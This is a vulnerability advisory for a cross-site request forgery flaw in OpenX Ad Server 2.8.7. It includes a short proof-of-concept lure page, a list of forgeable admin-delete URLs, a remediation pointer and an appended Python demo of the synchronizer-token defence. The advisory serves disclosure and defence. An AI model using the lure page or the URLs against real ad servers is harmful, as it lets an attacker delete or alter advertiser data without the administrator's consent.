
OpenX Ad Server 2.8.7 Cross-Site Request Forgery

Date: 2020-11-21 18:14

Title: OpenX Ad Server CSRF Vulnerability
Product: OpenX Ad Server
Vulnerable version: 2.8.7 and probably earlier versions
Fixed version: N/A
Impact: High
Homepage:
Tested on: Ubuntu 11.04
By: Narendra Shinde
=======================================================================

Vendor description:
-------------------
OpenX is the world's leading independent provider of digital advertising technology that enables businesses to manage and maximize their ad revenue. OpenX ad serving products are used by more than 200,000 websites in more than 100 countries and serve more than 350 billion ads monthly. OpenX Market reaches more than 400 million monthly unique users worldwide.
Source:

Vulnerability Information:
-------------------------
Class: Cross-Site Request Forgery (CSRF) [CWE-352]
Impact: Unintentional changes in application.
Remotely Exploitable: Yes
Authentication Required: No
User interaction Required: Yes

Vulnerability Description:
-----------------------------------
The administrative interface of OpenX Ad Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks. A remote attacker can force a logged-in administrator to perform unintended actions on the OpenX Ad Server by enticing the authenticated user to visit a malicious web page. Because the affected administrative actions are triggered by plain GET requests that carry no anti-CSRF token, the browser attaches the administrator's session cookie automatically and the action is executed. The attacker can modify application data.

Proof of concept:
-----------------
Code:
    <html>
    <body>
    <h1> Check This new Snap </h1>
    <a href="/www/admin/advertiser-delete.php?clientid=2"> Check This </a>
    </body>
    </html>

The following URLs could be used to perform CSRF attacks:
    /www/admin/advertiser-delete.php?clientid=[valid-id]
    /www/admin/advertiser-user-unlink.php?userid=[valid-id]&clientid=[valid-id]
    /www/admin/tracker-delete.php?clientid=[valid-id]&trackerid=[valid-id]

Workaround:
-----------
Apply the defences in the OWASP CSRF Prevention Cheat Sheet (per-session synchronizer tokens on every state-changing request, and no state changes on GET):
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Timeline:
---------
Discovered: 7/7/2011
Contacted vendor: No response
Again contacted vendor: 19/7/2011, no response
Public disclosure: 24/7/2011

Thanks & Regards,
Narendra
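The advisory's proof of concept works because the delete endpoint trusts nothing but the session cookie, which the browser sends on any cross-site request. The example below is added here and is not OpenX code or part of the original advisory: it models the vulnerable advertiser-delete handler as a toy Python function, then shows the same action hardened with the OWASP synchronizer-token pattern (state change only on POST, per-session token compared in constant time, Origin checked as defence in depth). The hostname `https://ads.example.test`, the request/session objects and the in-memory advertiser table are all assumptions made for the demonstration; only the path `/www/admin/advertiser-delete.php` and the `clientid` parameter are taken from the advisory.

```python
"""Synchronizer-token CSRF defence shown on a toy advertiser-delete handler (example code)."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

SITE_ORIGIN = "https://ads.example.test"        # assumed origin of the admin UI
SESSIONS: Dict[str, Dict[str, str]] = {}        # stand-in for the server's session table


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (assumed shape, not a real framework object)."""
    method: str
    path: str
    cookies: Dict[str, str] = field(default_factory=dict)
    params: Dict[str, str] = field(default_factory=dict)   # query string or form body
    origin: Optional[str] = None                            # Origin header, if the browser sent one


def login(user: str) -> str:
    """Create a session; the per-session CSRF token is the secret a cross-site page cannot read."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The value the server embeds as a hidden field in its own forms."""
    return SESSIONS[sid]["csrf"]


def advertiser_delete_vulnerable(req: Request, advertisers: Dict[int, str]) -> int:
    """The pattern in the advisory: any request carrying the admin's cookie is obeyed,
    and a plain GET link is enough to trigger it."""
    session = SESSIONS.get(req.cookies.get("sessionid", ""))
    if session is None:
        return 403
    advertisers.pop(int(req.params["clientid"]), None)
    return 200


def advertiser_delete_hardened(req: Request, advertisers: Dict[int, str]) -> int:
    """Same action with the synchronizer-token pattern plus an Origin check."""
    if req.method != "POST":                                   # state changes never ride on GET
        return 405
    session = SESSIONS.get(req.cookies.get("sessionid", ""))
    if session is None:
        return 403
    if req.origin is not None and req.origin != SITE_ORIGIN:   # cross-site Origin: reject early
        return 403
    submitted = req.params.get("csrf_token", "")
    # constant-time comparison; encode so non-ASCII input cannot raise instead of failing closed
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return 403
    advertisers.pop(int(req.params["clientid"]), None)
    return 200


def run_scenario() -> Dict[str, object]:
    """Replay the advisory's attack against both handlers and report the outcomes."""
    sid = login("admin")
    cookies = {"sessionid": sid}            # the browser attaches this on every request, cross-site too
    target = "/www/admin/advertiser-delete.php"

    # forged GET: the admin follows the attacker's link; only the cookie comes along
    forged_get = Request("GET", target, cookies=cookies, params={"clientid": "2"},
                         origin="https://attacker.example.test")
    # forged POST via an auto-submitting form, with the Origin header present ...
    forged_post = Request("POST", target, cookies=cookies, params={"clientid": "2"},
                          origin="https://attacker.example.test")
    # ... and with Origin absent, so only the token check stands between the request and the delete
    forged_post_no_origin = Request("POST", target, cookies=cookies, params={"clientid": "2"})
    # legitimate submission from the server's own form, carrying the session token
    legit_post = Request("POST", target, cookies=cookies,
                         params={"clientid": "2", "csrf_token": csrf_token_for(sid)},
                         origin=SITE_ORIGIN)

    vuln_db = {1: "acme", 2: "globex"}      # constructed sample data
    hard_db = {1: "acme", 2: "globex"}
    return {
        "vulnerable_status": advertiser_delete_vulnerable(forged_get, vuln_db),
        "vulnerable_db": vuln_db,
        "hardened_get_status": advertiser_delete_hardened(forged_get, hard_db),
        "hardened_forged_post_status": advertiser_delete_hardened(forged_post, hard_db),
        "hardened_no_origin_status": advertiser_delete_hardened(forged_post_no_origin, hard_db),
        "hardened_db_after_forgery": dict(hard_db),
        "hardened_legit_status": advertiser_delete_hardened(legit_post, hard_db),
        "hardened_db_after_legit": hard_db,
    }


if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(f"{name}: {value}")
```

Run as a script to see the forged GET delete advertiser 2 in the vulnerable handler while the hardened handler answers 405 to the GET, 403 to both forged POSTs, and 200 only to the request carrying the session's own token. In a real deployment the token check is the primary control; the Origin check and a `SameSite` attribute on the session cookie are defence in depth, since older clients may omit the header or ignore the attribute.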
